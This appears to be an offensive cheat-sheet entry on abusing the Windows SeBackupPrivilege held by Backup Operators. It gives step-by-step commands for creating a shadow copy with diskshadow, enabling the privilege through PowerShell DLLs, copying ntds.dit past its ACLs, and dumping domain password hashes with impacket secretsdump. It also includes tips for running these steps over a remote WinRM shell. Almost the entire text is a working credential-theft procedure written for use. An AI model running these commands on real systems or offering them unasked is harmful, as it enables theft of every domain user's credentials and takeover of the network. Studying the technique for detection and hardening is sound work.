SeBackupPrivilege

This privilege is a win. SeBackupPrivilege lets a process open any file for reading regardless of its ACL (the file is opened with backup semantics), so with it we can create a shadow copy of the system drive and read secrets such as the SYSTEM and SECURITY hives and NTDS.dit. It is held by default by members of Backup Operators; in whoami /priv it shows as Disabled until the process enables it.

Create a shadow copy of C: and expose it as a drive letter (the live ntds.dit is locked by LSASS, the snapshot copy is not):

diskshadow.exe
set context persistent nowriters
add volume C: alias morph3
create
expose %morph3% G:

diskshadow.exe puts you into an interactive session. Over a remote shell (e.g. WinRM) that prompt is unusable, so write the commands to a file and run diskshadow.exe /s file.txt instead. If the commands above don't work when typed in, try terminating each one with ;.

To abuse SeBackupPrivilege, load the DLLs from the SeBackupPrivilege PowerShell module (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll) and enable the privilege in the current process:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege

After that you can copy files the ACL would normally deny you, e.g. ntds.dit out of the exposed snapshot:

Copy-FileSeBackupPrivilege <source> <target>
Copy-FileSeBackupPrivilege G:\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit

Then, together with the SYSTEM hive (which holds the boot key used to decrypt the database), you can dump the hashes offline with impacket's secretsdump:

python secretsdump.py -system ./SYSTEM -ntds ./ntds.dit LOCAL
